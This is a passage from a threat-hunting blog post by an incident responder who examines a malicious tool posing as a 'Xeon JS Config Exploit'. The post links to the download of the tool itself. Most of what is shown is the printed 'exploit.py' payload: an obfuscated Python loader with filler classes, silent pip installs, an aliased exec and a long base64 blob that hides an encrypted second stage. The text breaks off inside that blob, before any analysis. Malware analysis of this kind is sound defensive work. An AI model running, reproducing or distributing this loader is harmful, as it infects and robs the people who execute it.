An incident responder who's seeking opportunities to work in technology company!
Operator in Cookie Han Hoan
Admin in Cyber Mely, CyberSpace
Forensic at @World Wide Flags
Operator in Cookie Han Hoan
Admin in Cyber Mely, CyberSpace
Forensic at @World Wide Flags
Xeon JS Config Exploit - Threat Hunting Real Case
Published on 12 Sep 2024
Hi everyone, this time I receieved a real case about a threat actor, it’s a great case for me because it needs both reversing and OSINT. Let’s go and see how interesting it is!
Click here for detail.
In the post, they attached tool in description: https://pixeldrain.com/u/2hcV6Z79:
Let’s download and analyse it! Inside zip file there are 7 files:
I will focus on 2 Python files because they are payloads that was executed.
exploit.py
from sys import executable, stderr
{'username': 'szeCjxa', 'age': 24}
OK5zprOJHG = 55875859
class eGlaSLUWdF:
def __init__(self):
self.data = True
def get_data(self):
return self.data
class RFsrZQdtWQ:
def __init__(self):
self.data = False
def get_data(self):
return self.data
Ti2X7Y521E = 23600745
AbJDmG9B8u = 19935358
class sdAkUQ8cHT:
def __init__(self):
self.data = False
def get_data(self):
return self.data
["'gfHaYdafEZ'", "'y2RxfvuMW0'", "'WCTAxbZnDZ'", "'DX6NVPr1pS'", "'pE9f8wxhlJ'"]
class obNoDtjRx3:
def __init__(self):
self.data = True
def get_data(self):
return self.data
class PVULTzh89a:
def __init__(self):
self.data = False
def get_data(self):
return self.data
class mrKidpjicw:
def __init__(self):
self.data = False
def get_data(self):
return self.data
xV478jUQBt = 23747526
class S552uX8Ils:
def __init__(self):
self.data = True
def get_data(self):
return self.data
x6QyQTY4CA = 7831170
class wDoABzZQ4y:
def __init__(self):
self.data = True
def get_data(self):
return self.data
ZJjaMzyYmj = 33497629
Qrg2AcEK18 = 11190430
class kI2POOmnZ6:
def __init__(self):
self.data = False
def get_data(self):
return self.data
class OmlcDYMjeK:
def __init__(self):
self.data = True
def get_data(self):
return self.data
'hUco2bSSX3'
QstHDmbB2e = 29478657
veJaLeXaTg = 86145784
ycS6diVEVI = 61119508
import ctypes;import base64,subprocess,sqlite3,json,shutil
import time
from importlib import import_module
requirements = [
["requests", "requests"],
["Cryptodome.Cipher", "pycryptodomex" if not 'PythonSoftwareFoundation' in executable else 'pycryptodome']
]
for modl in requirements:
try:
import_module(module[0])
except:
subprocess.Popen(executable + " -m pip install " +modl[1], shell=True)
time.sleep(3)
from json import loads, dumps
from urllib.request import Request, urlopen
try:
from cryptography.fernet import Fernet
except:
subprocess.run("python -m pip install cryptography")
try:
from cryptography.fernet import Fernet
except:
subprocess.run("python -m pip install cryptodomex", shell=True)
try:
import requests
except:
subprocess.run("python -m pip install requests", shell=True)
try:
from Cryptodome.Cipher import AES
except:
subprocess.Popen(executable + " -m pip install pycryptodome ", shell=True)
from Crypto.Cipher import AES
import requests
{'username': 'szeCjxa', 'age': 24}
OK5zprOJHG = 55875859
class eGlaSLUWdF:
def __init__(self):
self.data = True
def get_data(self):
return self.data
class RFsrZQdtWQ:
def __init__(self):
self.data = False
def get_data(self):
return self.data
Ti2X7Y521E = 23600745
AbJDmG9B8u = 19935358
class sdAkUQ8cHT:
def __init__(self):
self.data = False
def get_data(self):
return self.data
["'gfHaYdafEZ'", "'y2RxfvuMW0'", "'WCTAxbZnDZ'", "'DX6NVPr1pS'", "'pE9f8wxhlJ'"]
class obNoDtjRx3:
def __init__(self):
self.data = True
def get_data(self):
return self.data
class PVULTzh89a:
def __init__(self):
self.data = False
def get_data(self):
return self.data
class mrKidpjicw:
def __init__(self):
self.data = False
def get_data(self):
return self.data
xV478jUQBt = 23747526
class S552uX8Ils:
def __init__(self):
self.data = True
def get_data(self):
return self.data
x6QyQTY4CA = 7831170
class wDoABzZQ4y:
def __init__(self):
self.data = True
def get_data(self):
return self.data
ZJjaMzyYmj = 33497629
Qrg2AcEK18 = 11190430
class kI2POOmnZ6:
def __init__(self):
self.data = False
def get_data(self):
return self.data
class OmlcDYMjeK:
def __init__(self):
self.data = True
def get_data(self):
return self.data
'hUco2bSSX3'
QstHDmbB2e = 29478657
veJaLeXaTg = 86145784
ycS6diVEVI = 61119508
CSelYFNpYAX4jhfMiUEQGWQ3MocchTDMzojPWD = exec
{'username': 'szeCjxa', 'age': 24}
OK5zprOJHG = 55875859
class eGlaSLUWdF:
def __init__(self):
self.data = True
def get_data(self):
return self.data
class RFsrZQdtWQ:
def __init__(self):
self.data = False
def get_data(self):
return self.data
Ti2X7Y521E = 23600745
AbJDmG9B8u = 19935358
class sdAkUQ8cHT:
def __init__(self):
self.data = False
def get_data(self):
return self.data
["'gfHaYdafEZ'", "'y2RxfvuMW0'", "'WCTAxbZnDZ'", "'DX6NVPr1pS'", "'pE9f8wxhlJ'"]
class obNoDtjRx3:
def __init__(self):
self.data = True
def get_data(self):
return self.data
class PVULTzh89a:
def __init__(self):
self.data = False
def get_data(self):
return self.data
class mrKidpjicw:
def __init__(self):
self.data = False
def get_data(self):
return self.data
xV478jUQBt = 23747526
class S552uX8Ils:
def __init__(self):
self.data = True
def get_data(self):
return self.data
x6QyQTY4CA = 7831170
class wDoABzZQ4y:
def __init__(self):
self.data = True
def get_data(self):
return self.data
ZJjaMzyYmj = 33497629
Qrg2AcEK18 = 11190430
class kI2POOmnZ6:
def __init__(self):
self.data = False
def get_data(self):
return self.data
class OmlcDYMjeK:
def __init__(self):
self.data = True
def get_data(self):
return self.data
'hUco2bSSX3'
QstHDmbB2e = 29478657
veJaLeXaTg = 86145784
ycS6diVEVI = 61119508
import concurrent.futures
PZcTmMLNDhGxIyuHWAnzp4HJYLcvrDIwkJzqlN="CmltcG9ydCB0aW1lCnsndXNlcm5hbWUnOiAnc3plQ2p4YScsICdhZ2UnOiAyNH0KT0s1enByT0pIRyA9IDU1ODc1ODU5CmNsYXNzIGVHbGFTTFVXZEY6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gVHJ1ZQogICAgZGVmIGdldF9kYXRhKHNlbGYpOgogICAgICAgIHJldHVybiBzZWxmLmRhdGEKY2xhc3MgUkZzclpRZHRXUToKICAgIGRlZiBfX2luaXRfXyhzZWxmKToKICAgICAgICBzZWxmLmRhdGEgPSBGYWxzZQogICAgZGVmIGdldF9kYXRhKHNlbGYpOgogICAgICAgIHJldHVybiBzZWxmLmRhdGEKVGkyWDdZNTIxRSA9IDIzNjAwNzQ1CkFiSkRtRzlCOHUgPSAxOTkzNTM1OApjbGFzcyBzZEFrVVE4Y0hUOgogICAgZGVmIF9faW5pdF9fKHNlbGYpOgogICAgICAgIHNlbGYuZGF0YSA9IEZhbHNlCiAgICBkZWYgZ2V0X2RhdGEoc2VsZik6CiAgICAgICAgcmV0dXJuIHNlbGYuZGF0YQpbIidnZkhhWWRhZkVaJyIsICIneTJSeGZ2dU1XMCciLCAiJ1dDVEF4YlpuRFonIiwgIidEWDZOVlByMXBTJyIsICIncEU5Zjh3eGhsSiciXQpjbGFzcyBvYk5vRHRqUngzOgogICAgZGVmIF9faW5pdF9fKHNlbGYpOgogICAgICAgIHNlbGYuZGF0YSA9IFRydWUKICAgIGRlZiBnZXRfZGF0YShzZWxmKToKICAgICAgICByZXR1cm4gc2VsZi5kYXRhCmNsYXNzIFBWVUxUemg4OWE6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gRmFsc2UKICAgIGRlZiBnZXRfZGF0YShzZWxmKToKICAgICAgICByZXR1cm4gc2VsZi5kYXRhCmNsYXNzIG1yS2lkcGppY3c6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gRmFsc2UKICAgIGRlZiBnZXRfZGF0YShzZWxmKToKICAgICAgICByZXR1cm4gc2VsZi5kYXRhCnhWNDc4alVRQnQgPSAyMzc0NzUyNgpjbGFzcyBTNTUydVg4SWxzOgogICAgZGVmIF9faW5pdF9fKHNlbGYpOgogICAgICAgIHNlbGYuZGF0YSA9IFRydWUKICAgIGRlZiBnZXRfZGF0YShzZWxmKToKICAgICAgICByZXR1cm4gc2VsZi5kYXRhCng2UXlRVFk0Q0EgPSA3ODMxMTcwCmNsYXNzIHdEb0FCelpRNHk6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gVHJ1ZQogICAgZGVmIGdldF9kYXRhKHNlbGYpOgogICAgICAgIHJldHVybiBzZWxmLmRhdGEKWkpqYU16eVltaiA9IDMzNDk3NjI5ClFyZzJBY0VLMTggPSAxMTE5MDQzMApjbGFzcyBrSTJQT09tblo2OgogICAgZGVmIF9faW5pdF9fKHNlbGYpOgogICAgICAgIHNlbGYuZGF0YSA9IEZhbHNlCiAgICBkZWYgZ2V0X2RhdGEoc2VsZik6CiAgICAgICAgcmV0dXJuIHNlbGYuZGF0YQpjbGFzcyBPbWxjRFlNamVLOgogICAgZGVmIF9faW5pdF9fKHNlbGYpOgogICAgICAgIHNlbGYuZGF0YSA9IFRydWUKICAgIGRlZiBnZXRfZGF0YShzZWxmKToKICAgICAgICByZXR1cm4gc2VsZi5kYXRhCidoVWNvMmJTU1gzJwpRc3RIRG1iQjJlID0gMjk0Nzg2NTcKdmVKYUxlWGFUZyA9IDg2MTQ1Nzg0CnljUzZkaVZFVkkgPSA2MTExOTUwOAppbXBvcnQgemxpYgppbXBvcnQgYmFzZTY0CnsndXNlcm5hbWUnOiAnc3plQ2p4YScsICdhZ2UnOiAyNH0KT0s1enByT0pIRyA9IDU1ODc1ODU5CmNsYXNzIGVHbGFTTFVXZEY6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gVHJ1ZQogICAgZGVmIGdldF9kYXRhKHNlbGYpOgogICAgICAgIHJldHVybiBzZWxmLmRhdGEKY2xhc3MgUkZzclpRZHRXUToKICAgIGRlZiBfX2luaXRfXyhzZWxmKToKICAgICAgICBzZWxmLmRhdGEgPSBGYWxzZQogICAgZGVmIGdldF9kYXRhKHNlbGYpOgogICAgICAgIHJldHVybiBzZWxmLmRhdGEKVGkyWDdZNTIxRSA9IDIzNjAwNzQ1CkFiSkRtRzlCOHUgPSAxOTkzNTM1OApjbGFzcyBzZEFrVVE4Y0hUOgogICAgZGVmIF9faW5pdF9fKHNlbGYpOgogICAgICAgIHNlbGYuZGF0YSA9IEZhbHNlCiAgICBkZWYgZ2V0X2RhdGEoc2VsZik6CiAgICAgICAgcmV0dXJuIHNlbGYuZGF0YQpbIidnZkhhWWRhZkVaJyIsICIneTJSeGZ2dU1XMCciLCAiJ1dDVEF4YlpuRFonIiwgIidEWDZOVlByMXBTJyIsICIncEU5Zjh3eGhsSiciXQpjbGFzcyBvYk5vRHRqUngzOgogICAgZGVmIF9faW5pdF9fKHNlbGYpOgogICAgICAgIHNlbGYuZGF0YSA9IFRydWUKICAgIGRlZiBnZXRfZGF0YShzZWxmKToKICAgICAgICByZXR1cm4gc2VsZi5kYXRhCmNsYXNzIFBWVUxUemg4OWE6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gRmFsc2UKICAgIGRlZiBnZXRfZGF0YShzZWxmKToKICAgICAgICByZXR1cm4gc2VsZi5kYXRhCmNsYXNzIG1yS2lkcGppY3c6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gRmFsc2UKICAgIGRlZiBnZXRfZGF0YShzZWxmKToKICAgICAgICByZXR1cm4gc2VsZi5kYXRhCnhWNDc4alVRQnQgPSAyMzc0NzUyNgpjbGFzcyBTNTUydVg4SWxzOgogICAgZGVmIF9faW5pdF9fKHNlbGYpOgogICAgICAgIHNlbGYuZGF0YSA9IFRydWUKICAgIGRlZiBnZXRfZGF0YShzZWxmKToKICAgICAgICByZXR1cm4gc2VsZi5kYXRhCng2UXlRVFk0Q0EgPSA3ODMxMTcwCmNsYXNzIHdEb0FCelpRNHk6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gVHJ1ZQogICAgZGVmIGdldF9kYXRhKHNlbGYpOgogICAgICAgIHJldHVybiBzZWxmLmRhdGEKWkpqYU16eVltaiA9IDMzNDk3NjI5ClFyZzJBY0VLMTggPSAxMTE5MDQzMApjbGFzcyBrSTJQT09tblo2OgogICAgZGVmIF9faW5pdF9fKHNlbGYpOgogICAgICAgIHNlbGYuZGF0YSA9IEZhbHNlCiAgICBkZWYgZ2V0X2RhdGEoc2VsZik6CiAgICAgICAgcmV0dXJuIHNlbGYuZGF0YQpjbGFzcyBPbWxjRFlNamVLOgogICAgZGVmIF9faW5pdF9fKHNlbGYpOgogICAgICAgIHNlbGYuZGF0YSA9IFRydWUKICAgIGRlZiBnZXRfZGF0YShzZWxmKToKICAgICAgICByZXR1cm4gc2VsZi5kYXRhCidoVWNvMmJTU1gzJwpRc3RIRG1iQjJlID0gMjk0Nzg2NTcKdmVKYUxlWGFUZyA9IDg2MTQ1Nzg0CnljUzZkaVZFVkkgPSA2MTExOTUwOApmcm9tIHN5cyBpbXBvcnQgZXhlY3V0YWJsZSwgc3RkZXJyCgoKdHJ5OgogICAgaW1wb3J0IGNyeXB0b2dyYXBoeQpleGNlcHQgSW1wb3J0RXJyb3I6CiAgICBzdWJwcm9jZXNzLnJ1bigncHl0aG9uIC1tIHBpcCBpbnN0YWxsIGNyeXB0b2dyYXBoeScsIHNoZWxsPVRydWUpCiAgICBmcm9tIGNyeXB0b2dyYXBoeS5mZXJuZXQgaW1wb3J0IEZlcm5ldAoKaW1wb3J0IHN1YnByb2Nlc3MKZnJvbSBpbXBvcnRsaWIgaW1wb3J0IGltcG9ydF9tb2R1bGUKCnJlcXVpcmVtZW50cyA9IFsKICAgIFsicmVxdWVzdHMiLCAicmVxdWVzdHMiXSwKICAgIFsiQ3J5cHRvZG9tZS5DaXBoZXIiLCAicHljcnlwdG9kb21leCIgaWYgbm90ICdQeXRob25Tb2Z0d2FyZUZvdW5kYXRpb24nIGluIGV4ZWN1dGFibGUgZWxzZSAncHljcnlwdG9kb21lJ10KXQpmb3IgbW9kbCBpbiByZXF1aXJlbWVudHM6CiAgICB0cnk6CiAgICAgICAgaW1wb3J0X21vZHVsZShtb2R1bGVbMF0pCiAgICBleGNlcHQ6CiAgICAgICAgc3VicHJvY2Vzcy5Qb3BlbihleGVjdXRhYmxlICsgIiAtbSBwaXAgaW5zdGFsbCAiICttb2RsWzFdLCBzaGVsbD1UcnVlKQogICAgICAgIHRpbWUuc2xlZXAoMykKCmltcG9ydCByZXF1ZXN0cwoKZnJvbSBjcnlwdG9ncmFwaHkuZmVybmV0IGltcG9ydCBGZXJuZXQgYXMgaFhSR0RHQ1BUclJ2Ynp3YVVsRmJtUUNvRDhPQ1k0cmpZQ094TjUKCnRyeToKICAgIGZyb20gQ3J5cHRvZG9tZS5DaXBoZXIgaW1wb3J0IEFFUwpleGNlcHQ6CiAgICBzdWJwcm9jZXNzLlBvcGVuKGV4ZWN1dGFibGUgKyAiIC1tIHBpcCBpbnN0YWxsIHB5Y3J5cHRvZG9tZSAiLCBzaGVsbD1UcnVlKQogICAgZnJvbSBDcnlwdG8uQ2lwaGVyIGltcG9ydCBBRVMKICAgIAplbmNvZGVkX2NvZGUgPSAiWjBGQlFVRkJRbTB3ZEZWdFJrSjZkVGhzWXpWNVFrWnZUblJRUTNoRVJIQnFhazVJWVZkRFZGQktYMjQ1UTFWWlJIVkZWakY2VGtGT1RqZFZURmt5Y1c1eVpVUk9SRXBMYkV0bFMyMUdUMm8zUlRKM1NEWkZVRk5WTVZJdFFtbExaVzVJZURjeFRWTTVjMjVxV0VvM1N6ZzRURWc0YWpWUVJrOVBSWEo1UldoMFpFTjNXR2RPWWtSVFF6WTRiMVZpYW5weU9IUjVVbk4wTkRoTVFVVmhWekIxWmpaaVNYSkdhRzFvWVVzNFNuVTJjMEowU2pKTmQyNXhSMWszWVU5c1IzbFZjM2x2Y1U1U1pXUlhWRkZWWVZOeWFsUndibEEwVTIxT1NERTFWVWgwYlZwdmFrbzNSMjkzWkRKTmEwOXlhRWMyTXpVdFFXaG5jSGhDUXpsMVozVk9SRkZyVlhVek5rRm1PVk5YYzFSbk5FMTVWWFJOYnpSd1h6Vm5SRVp0WlVGTE4wOVNNM0UzWTI5aVZuVmlXRWhtTTB0T2FtczJaRzk1Wm5KaGJrSkxiblJuTVRabWJtUk9hbk00V1hWQ2JGQk5NeTFxYzBGWFZHWlhablpUWkdkdVVrTnFTV2RXTFU5RlVYZGhhMFEwZEZkR01YUmZiWEZoZG1kWmJETlhObUZzTVhobmJIaHJWM0U1YkZrM2RYTkJTMHRuVm0xaFVtTTJjVEJxT1dSNGRXMVpNMHBtVm5SWGNqUldUbkpWUkdkMmRWbEdiR0Z1Wm14MlZHeGxlbXhmU3pOVk5WVnhiRWxIZDA0emJGVnhPRXBZWDI5aU0xSnFRVXBqVTE5b1oxOUxNbGhZY0RZMlFVUnRWSGxMT1hSRFNsQkpTMUJ1YldzeWVsRmhaM3BPTFU5UlIwcElhVTUwYlcxMmQyVklRM3AwTXpkWlNYY3RZbEJSTVc0MFRFUmFWR05zYm1WQ01XNUhXVkZZV25ZMWIwa3pUV2RQVVU0d2MzWjRka05QU0VOWE9UUnNUVmR4WDFoVWVrdFJjR3RxZVd3NWVHOTRjMGsyT0dWWWVEVlJkWGhVYlZFd1p6TkRja2czZFU5U01rUnBaMlZTVW1wVlFrWlBXbWN4Y2xWYVFYUlZNbWxKZFVGcVZ5MUZOVXRsUm1GRVlXZFRSRWxYVlVoTk9ITkxRbDlYYkU5ZlRFMVhZa0ZOZEhORWNWaHNjbTF2VnpRelMxUXljbTB5Y2taSFEwb3dOVEpyYUcwNFUxcE1OMVZOTFhNMmFEbDBObVUwUTJsYVNtbzVOblZpUkdoUFVrTTVSbGRITjJoVGQyZDZkRk13ZVMxMGFFcEhaVzVLTWtKZlJHVkdkSEZtVlV4TlVtMUZSMFZXUlhWSmNuSTRiVk5hZEZSdVUwcHNWemw0UlhwV1pFaGthbVpTYjI5blVVaEZia1p0WlZOVWMyOTVUWE5ZZDJGNk9VVjFlVGhaTUVSM01qSmxNSFZrYVRWUFYwbHFUVEV5ZUV4NlptVktVMnRoZFhaQ1EzVk1VMGhqY2tOVVlUVXhaM1pWWlhSWlFuZHhXbVk1V2tab1NHdFdiM014TUVzdFoyWnRWa3RqWTJsSGFsbG9UMGd6ZUMxSmJVNUZOVEYyU0VwSmQzTnlYMEpsY1VSRloyVjBZMU5EVkZwNE16bDZaRE5rYWxGSFZrbDNUemRrVDJGMGVVaEdUV3d3YkdoaFkwUnNZVEJKVTFnd1ZITnVWMGxoTW5oVVFYbDFla1J1V21RNFpHWjVWMnhpY0cxU2ExZEdPR053WkRaNFExSnJORFpSVkRCR09GRnFiVnBLYmpCbGNHdHdRa3hSUW5Fd2RISlBXV3hHVmxwQllWUlRUakUxYVRCUlh6QllhV0ZzUjJNNVJsWlBZMjR0WVVGc1RISkVPWFpQT0ZjME9HWTRSRGhDWkdaWWVtZHFPR2RaZFROb1EzTmxUVzF1WTJSTU9HOXVVblZtVDFoWVVFUkNTbWRMWjNSMFRVSkZiVWhFUjFGTGQyWTVVa2xJVkhkak5IVm9hRGRXYm5CcVJXOVNYMUZQVjJ4RmRXSnNPRXhMVkV0ZmFpMXJZbWRXWmpGM04wUXdOMDF4Y1ZWWVVrWkNVMEp1ZGxBM1VWRjZRMFUwVjI1NU9VMUZVMGxHUm1Gd1FqaEZXWHBvU21wVFltRjNWbk5SUjFONVFUbHdjazV2ZUV0alRERldMVGxLYkZVMVFqRjRSVGhEWWtKNk1VSlJZMU5CTjFGMk9WSTVUMjB5V1hWc1ZrTTFRbVEwWTBKUmNXVlpOREpaY0ZCT2NWZDFkamxoWHpKVVFXSjJSWGxCUzJKcVUwTkVZakpTVUhsS00wcFBXRFZmTlhkaFdrTkZhVTFHV1U5QloydENURFJwVFRCMVNuSkphMDFCZG05aGVYb3dWVmhFYUZJMFJtOTJaVzlFTVdZNFdHSklaRWxYTlVjd2VFVnFaRWMwY2xGWk5URnBSV05rVDJ0R1JUUlNjMWRKUjIxVE0zcHRTMU4xYldSNlRuTjZRMGs1TlY5b1ZrVTFiSGxmWmxKVldta3RSekI0Yld4YWQyeENXbVJsTXkxdFVFOVdibmhCVm5wNFJXdFBjMWxsTVZvM2R6ZHBjbkZhTXpCTk1VSklkV1I0YW05bVdFUmxkWFZHYVdKdVVrRjJZVWd6WlVzMlRFdGFTM1ZsWVhWdkxVcE5kME15VTBOVE9VVmlaRFZmWVdJeVMxVjJNREF3VEdseVEyRm5UMWRhYlZOTVVFcERVa2xGZFcxRFJEQm9jbVI2VUZONWJrNWpSV3BuVjJSRFoyWnJTSGRhUlhoMlpUQlFaMkl3YjNWc1RXMVZiMlZ5VHpoc2JsSmlZaTB5VDJKd2EyWmZWVVUzT1dkdU9WWk9VRzFTU25OVVRYWlZWbVoxVkVGRE0yeFVhakZHVUdoNGNuWklUREpIU25GWU1VeFZWbDkxY0hkbVVuRmZOR2h6U0ZNMmJEVldXbDkyYVRaUFRrdHhUV2hMTTFwdlRGQldTVUpPWWpKNU1GUkpjMjVCUTNnMGR6QnlMWGxsVTBWck9HRmlUMDVETVUwMlVVazNaMFI0YWxCVVVHRkRXbWh3YW5oa01VcGlabVZKU0hNd1pGaHFXazg0U1VjeGFIRm1UM1JFUzNWeGIxODBWVXRyWlRkdWNUTXRSVVZGZDAxcGJWQllZa2xOVTBVM04yNUJWQzFwZW5KRE9HdERhRGQzVFhNemFTMWZSRlZsUzI5d01IZFVaR1pZY1dGR1UyZDZTREJ6U0RaVkxVRXlVRlo1WVZZeVpXeE9OVTlmWlhKV1oyOHhTVmhITW1VNWNVaFdkbmRhYW5OSlZGRm9aMVV0UTNSVmRIZDRhRFZMVDNkaU5HcHpiRTg0VlhST05ETlFTV1JhVUc5eWIwWTVUVEEyZVV4MGRGbE5TM0ZqTVdwd2NHNTRZVmRpVTBoeldtOVRNM2swU0hwR01uQnRYMjF2VG1SRU9GOWlTamQ1UkdzMGJtNVBiMHBJTWpCM09HbHhUekJhTUdsVVdtbGpOblJsZGtSWVNuUk1iakl3V1ZvNGVrNVdYM05QYWtoWk5HMDRRVlZ3TTI5b0xXTjJjMWxVZUU1RFZGaHJSVk5SV2twMGJrazFTMEpHTUdaZlUxcE5UMVpaV1doMWVrTnpSa1pPUm5vMmJHNWZVSE15YWpGd1YzUk9VVWRSZDJsUlEwdHJXVk5PWm14aFUwaHhVbkJ6T1hsSVEwcFJUbWRuWjJacVRYVjNNbVY1Y1ZvNWNrTTBXRWhuTlhobFNWZzBZMmxhZFMxRFdWVmpOblJEVWxKVmJuQnJWVk5yUjA5aE5tTm1Wa3AzUzFsMVdFWmtOVXBhT1dadlQyaGxVWGc1Y0U1bFNEaFVkMnhvTVc5eVVuVklWa2RVV0U1Tk5HRTNkMFJPVm1kcGQwTjZPVlphV2tScmNYUnJiWEJCYXpBNE5WSk5WMjlsV2s1cFFsWTVaRUo1WjJndE1YaGxhbkI2UkZsMlkxbFdaREpaZFhoQ2RVWllaalJoVG5GeFpsTlVlVEJWWTFBM01rTTJSMDl2Ym1WelZUWXdNa0pEZFV0dk5VdHVaWEZ3Y1hCYVFsWktkRXhoYUdaalRrSXpORzlrZEdvd1JYaFdNMHhmTjFWV1psSnhjMmhKY0Vzd2RuUm9lV3RUYVZaUWFVUjRkbGxLVFhNNFVtNUljR3N5VURkNVNVVlFNazFNTlRkMVR6WllWa1ZYVWpoVWR6RlVVMVEzWkZsS1ZYQlZiUzFCWTJGSFkxUlNkWFJpUWpWMWFqVkRRMGs0WldWaVluUldabGhtTkdKV2RFeDZVMDk2U0cxdGJYTkViWFJzTWtGTWRrVnNZVUZ3WWpoMFdYUkVlbFpTWVRZM1VFd3pVV1ZhYUhKMFRFVXpUVXRwVkhaNGJUSjJNek5LZVhaeFpqaEtPRlJHVDNBellUbHVTRFoyTlMxV2R6WkxMVXh1Vkd0Ulp6aDRja0ZCVW5OSE5EWkRhMWswYkhKZk1HUXROMTlPWmpKV1dWSkdlRjlXTFV0UWQyNWxWblpqWlZveldUUjJRM2h2UmtReWF5MWlkV2MwZVdWYWNYUkZZMGhzUWxNNFJYaEdUMWhKYmtsVmQwSldRM0pDY1MwNWFVMUJkRlI2ZWt0NWVHUlRjWFF6YkV4aGRFcERNMmhtTVdwTkxVRmlaRWhyTm5kdFJ6YzVNRzFFZHpoWmFsRllMVk14YUMweVQxVnhhWGM0UWpVeldtWTRTekJQZWt0U1NVeEVMWGsyUWpGeGR6TlRjRGN6YW0xemRrdExRM0U0VVRRelRUVlRTR1JSTVRnNFdVVlRXWHBpUlVsNFNuSk9jRlJSY0ZKdk9IVkpWa2R2ZDJkZllXTnNjakJUUlRaSk9HNVhhbkpTVjBWbk1VRnhkWGROZDIxeldWcFZTRTVGV0d0RVpWQmpPR2xuVlcxRVEyUXdRbGhoTVdWMGVFRlBSRVp3ZWtKTFZ6RXRPR05UYlVSa05ETXRNVEo1YTBSc2F6UnVVMmxyUkVzd1gwbExVV2xNUlhOUVkzYzVZbTgzU21ZeGJrdEZRbU55YTFaeU5tRjZkMVl5ZVY5VGFYVk9iVGwwV1RGUU9VeHNTbEJ0TWtWSloyaDFhME14UzAweVVYaEVObmQxZGw5M2JrNXFjR3c0Y0ZFeWJHSkhSRTFTUldwMk9ETjRkV00xZFZCSldDMXlVbU4xWlRCdWVtczRaR0kyUlhabGEwTjJSMFJsVG5OQ1VVdGtSRUoxWHpaUFl5MU5kRVV0UTJneWVFbHdTSHBxVjBrMlJHVTNNV2c1UVhWc1EzTm1iRm8zVFhGc2RYbGthRTAyUkhSS2RFMHRXbUV4VDJWcmFrOXVVbXhtWDJNNU5rSmlOVWxHYTNKR01HTXhNVmsxVkV4VVQwWjBVMEZqVDJSbFYwWk1OSHBXTkRaaVNFbzJOMU5hWTFSUU16Vmpha2RGY0UxRGFtTkZjVUZoZGxoVmFHSndNMnhJUVVoUE1pMWFSVTQxUms5c1kzUlBhbXRhTkZKbmFHZ3lObWcwUlhwRFIwazBXRFYzVnpkUmVFb3dRME16U0haTlMwWk5kVk5xVmpaTmVFMXFSMWxDZVRGS1l6SlhlbnBhT0c4eFNGbEpZalJMVGpSVE1GTnRVelV6U0ZVNVExSTFZbU5aTFVwblNYQllOVkp6TVUwNE5rbGhTMjEwUzNoZlNURmtWamxKTUdaelExUkdhWFZpYURGRmFVNUZNV1V5IgpDU2VsWUZOcFlBWDRqaGZNaVVFUUdXUTNNb2NjaFRETXpvalBXRCA9IGV4ZWMKZW5jcnlwdGVkX2NvZGUgPSBiYXNlNjQuYjY0ZGVjb2RlKGVuY29kZWRfY29kZSkKeyd1c2VybmFtZSc6ICdzemVDanhhJywgJ2FnZSc6IDI0fQpPSzV6cHJPSkhHID0gNTU4NzU4NTkKY2xhc3MgZUdsYVNMVVdkRjoKICAgIGRlZiBfX2luaXRfXyhzZWxmKToKICAgICAgICBzZWxmLmRhdGEgPSBUcnVlCiAgICBkZWYgZ2V0X2RhdGEoc2VsZik6CiAgICAgICAgcmV0dXJuIHNlbGYuZGF0YQpjbGFzcyBSRnNyWlFkdFdROgogICAgZGVmIF9faW5pdF9fKHNlbGYpOgogICAgICAgIHNlbGYuZGF0YSA9IEZhbHNlCiAgICBkZWYgZ2V0X2RhdGEoc2VsZik6CiAgICAgICAgcmV0dXJuIHNlbGYuZGF0YQpUaTJYN1k1MjFFID0gMjM2MDA3NDUKQWJKRG1HOUI4dSA9IDE5OTM1MzU4CmNsYXNzIHNkQWtVUThjSFQ6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gRmFsc2UKICAgIGRlZiBnZXRfZGF0YShzZWxmKToKICAgICAgICByZXR1cm4gc2VsZi5kYXRhClsiJ2dmSGFZZGFmRVonIiwgIid5MlJ4ZnZ1TVcwJyIsICInV0NUQXhiWm5EWiciLCAiJ0RYNk5WUHIxcFMnIiwgIidwRTlmOHd4aGxKJyJdCmNsYXNzIG9iTm9EdGpSeDM6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gVHJ1ZQogICAgZGVmIGdldF9kYXRhKHNlbGYpOgogICAgICAgIHJldHVybiBzZWxmLmRhdGEKY2xhc3MgUFZVTFR6aDg5YToKICAgIGRlZiBfX2luaXRfXyhzZWxmKToKICAgICAgICBzZWxmLmRhdGEgPSBGYWxzZQogICAgZGVmIGdldF9kYXRhKHNlbGYpOgogICAgICAgIHJldHVybiBzZWxmLmRhdGEKY2xhc3MgbXJLaWRwamljdzoKICAgIGRlZiBfX2luaXRfXyhzZWxmKToKICAgICAgICBzZWxmLmRhdGEgPSBGYWxzZQogICAgZGVmIGdldF9kYXRhKHNlbGYpOgogICAgICAgIHJldHVybiBzZWxmLmRhdGEKeFY0NzhqVVFCdCA9IDIzNzQ3NTI2CmNsYXNzIFM1NTJ1WDhJbHM6CiAgICBkZWYgX19pbml0X18oc2VsZik6CiAgICAgICAgc2VsZi5kYXRhID0gVHJ1ZQogICAgZGVmIGdldF9kYXRhKHNlbGYpOgogICAgICAgIHJldHVybiBzZWxmLmRhdGEKeDZReVFUWTRDQSA9IDc4MzExNzAKY2xhc3Mgd0RvQUJ6WlE0eToKICAgIGRlZiBfX2luaXRfXyhzZWxmKToKICAgICAgICBzZWxmLmRhdGEgPSBUcnVlCiAgICBkZWYgZ2V0X2RhdGEoc2VsZik6CiAgICAgICAgcmV0dXJuIHNlbGYuZGF0YQpaSmphTXp5WW1qID0gMzM0OTc2MjkKUXJnMkFjRUsxOCA9IDExMTkwNDMwCmNsYXNzIGtJMlBPT21uWjY6CiAgICBkZWYgX19pbml0X18oc2VsZik6Ci